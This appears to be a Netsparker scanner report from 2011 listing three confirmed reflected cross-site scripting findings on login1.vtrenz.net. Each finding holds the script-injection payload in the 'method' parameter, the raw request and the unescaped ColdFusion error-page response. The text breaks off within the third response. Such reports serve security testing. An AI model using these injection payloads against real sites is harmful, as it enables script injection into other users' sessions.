﻿<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet href="vulnerabilities-list.xsl" type="text/xsl" ?>
<netsparker generated="3/8/2011 5:40:46 AM">
	<target>
		<url>https://login1.vtrenz.net/</url>
        <scantime>842</scantime>
	</target>
	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A4B)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>method</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000A4B)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000A4B)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 27
Accept-Encoding: gzip, deflate

login=3&amp;password=3&amp;submit=3
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:06:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            malformed Fuseaction
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            You specified a malformed Fuseaction of &apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000A4B)&lt;/script&gt;. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:06 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000AC8)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>method</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000AC8)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000AC8)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 18
Accept-Encoding: gzip, deflate

login=3&amp;password=3
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:06:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#4646EE&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            Error Occurred While Processing Request
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
    

    &lt;table width=&quot;500&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot;&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tableProps2&quot; align=&quot;left&quot; valign=&quot;middle&quot; width=&quot;500&quot;&gt;
            &lt;h1 id=&quot;textSection1&quot; style=&quot;COLOR: black; FONT: 13pt/15pt verdana&quot;&gt;
            malformed Fuseaction
            &lt;/h1&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td id=&quot;tablePropsWidth&quot; width=&quot;400&quot; colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            You specified a malformed Fuseaction of &apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000AC8)&lt;/script&gt;. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td height&gt;&amp;nbsp;&lt;/td&gt;
    &lt;/tr&gt;

    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;
            Resources:
            &lt;ul&gt;
	    
                 &lt;li&gt;Enable Robust Exception Information to provide greater detail about the source of errors.  In the Administrator, click Debugging &amp; Logging &gt; Debug Output Settings, and select the Robust Exception Information option.&lt;/li&gt;
            
	&lt;li&gt;Check the &lt;a href=&apos;http://www.macromedia.com/go/proddoc_getdoc&apos; target=&quot;new&quot;&gt;ColdFusion documentation&lt;/a&gt; to verify that you are using the correct syntax.&lt;/li&gt;
	&lt;li&gt;Search the &lt;a href=&apos;http://www.macromedia.com/support/coldfusion/&apos; target=&quot;new&quot;&gt;Knowledge Base&lt;/a&gt; to find a solution to your problem.&lt;/li&gt;

            &lt;/ul&gt;
            &lt;p&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    
    &lt;tr&gt;
        &lt;td colspan=&quot;2&quot;&gt;
            &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Browser&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Remote Address&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;10.120.0.37&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Referrer&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;https://login1.vtrenz.net/&lt;/td&gt;
        	&lt;/tr&gt;
        	&lt;tr&gt;
        	    &lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;Date/Time&amp;nbsp;&amp;nbsp;&lt;/td&gt;
        		&lt;td&gt;&lt;font style=&quot;COLOR: black; FONT: 8pt/11pt verdana&quot;&gt;08-Mar-11 06:06 AM&lt;/td&gt;
        	&lt;/tr&gt;
            &lt;/table&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    
    
    &lt;/font&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
    &lt;/table&gt;
    &lt;/body&gt;&lt;/html&gt;

    
     ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://login1.vtrenz.net/index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000AE9)%3C/script%3E</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Querystring</vulnerableparametertype>
		<vulnerableparameter>method</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000AE9)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /index.cfm?method=&apos;%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000AE9)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 40
Accept-Encoding: gzip, deflate

login=3&amp;password=3&amp;submit.x=0&amp;submit.y=0
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:07:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
&lt;title&gt;Sorry! An error has occured.&lt;/title&gt;

&lt;style&gt;
	.errorHeader{
		font-family:Arial, Helvetica, sans-serif;
		font-weight:bold;
		color:#000000;
		font-size:14px;
		background-color:#f2f2f2;
		padding:4px;
		border:1px solid #cccccc;
	}
	.errorText{
		font-family:Arial, Helvetica, sans-serif;
		font-size:11px;
		padding:4px;
	}
	.errorFooter{
		font-family:Arial, Helvetica, sans-serif;
		color:#999999;
		font-size:11px;
		background-color:#f2f2f2;
		padding:2px;
		border:1px solid #cccccc;
	}
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;





&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;585&quot; align=&quot;center&quot;&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorHeader&quot;&gt;An Error Has Occurred.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;An unknown error occurred while attempting to process your request.&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td align=&quot;left&quot; valign=&quot;middle&quot; class=&quot;errorText&quot;&gt;
			&lt;br&gt;
			If you continue to recieve this error and would like further assistance, please send an email
			to &lt;a href=&quot;mailto: &lt;!-- &quot; ---&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TD&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TH&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/TABLE&gt;&lt;/A&gt;&lt;/ABBREV&gt;&lt;/ACRONYM&gt;&lt;/ADDRESS&gt;&lt;/APPLET&gt;&lt;/AU&gt;&lt;/B&gt;&lt;/BANNER&gt;&lt;/BIG&gt;&lt;/BLINK&gt;&lt;/BLOCKQUOTE&gt;&lt;/BQ&gt;&lt;/CAPTION&gt;&lt;/CENTER&gt;&lt;/CITE&gt;&lt;/CODE&gt;&lt;/COMMENT&gt;&lt;/DEL&gt;&lt;/DFN&gt;&lt;/DIR&gt;&lt;/DIV&gt;&lt;/DL&gt;&lt;/EM&gt;&lt;/FIG&gt;&lt;/FN&gt;&lt;/FONT&gt;&lt;/FORM&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;&lt;/H1&gt;&lt;/H2&gt;&lt;/H3&gt;&lt;/H4&gt;&lt;/H5&gt;&lt;/H6&gt;&lt;/HEAD&gt;&lt;/I&gt;&lt;/INS&gt;&lt;/KBD&gt;&lt;/LISTING&gt;&lt;/MAP&gt;&lt;/MARQUEE&gt;&lt;/MENU&gt;&lt;/MULTICOL&gt;&lt;/NOBR&gt;&lt;/NOFRAMES&gt;&lt;/NOSCRIPT&gt;&lt;/NOTE&gt;&lt;/OL&gt;&lt;/P&gt;&lt;/PARAM&gt;&lt;/PERSON&gt;&lt;/PLAINTEXT&gt;&lt;/PRE&gt;&lt;/Q&gt;&lt;/S&gt;&lt;/SAMP&gt;&lt;/SCRIPT&gt;&lt;/SELECT&gt;&lt;/SMALL&gt;&lt;/STRIKE&gt;&lt;/STRONG&gt;&lt;/SUB&gt;&lt;/SUP&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TEXTAREA&gt;&lt;/TH&gt;&lt;/TITLE&gt;&lt;/TR&gt;&lt;/TT&gt;&lt;/U&gt;&lt;/UL&gt;&lt;/VAR&gt;&lt;/WBR&gt;&lt;/XMP&gt;

    &lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;

    

    	&lt;html&gt;
    		&lt;head&gt;
    			&lt;title&gt;Error Occurred While Processing Request&lt;/title&gt;


    &lt;script language=&quot;JavaScript&quot;&gt;
    function showHide(targetName) {
        if( document.getElementById ) { // NS6+
            target = document.getElementById(targetName);
        } else if( document.all ) { // IE4+
            target = document.all[targetName];
        }

        if( target ) {
            if( target.style.display == &quot;none&quot; ) {
                target.style.display = &quot;inline&quot;;
            } else {
                target.style.display = &quot;none&quot;;
            }
        }
    }
    &lt;/script&gt;


    	    &lt;/head&gt;
    	&lt;body&gt;

    &lt;font style=&quot;COLOR: black; FONT: 16pt/18pt verdana&quot;&gt;
    	The web site you are accessing has experienced an unexpected error.&lt;br&gt;
		Please contact the website administrator.
		
    &lt;/font&gt;
	&lt;br&gt;&lt;br&gt;
    &lt;table border=&quot;1&quot; cellpadding=&quot;3&quot; bordercolor=&quot;#000808&quot; bgcolor=&quot;#e7e7e7&quot;&gt;
    &lt;tr&gt;
        &lt;td bgcolor=&quot;#000066&quot;&gt;
            &lt;font style=&quot;COLOR: white; FONT: 11pt/13pt verdana&quot; color=&quot;white&quot;&gt;
            The following information is meant for the website developer for debugging purposes. 
            &lt;/font&gt;
        &lt;/td&gt;
    &lt;tr&gt;
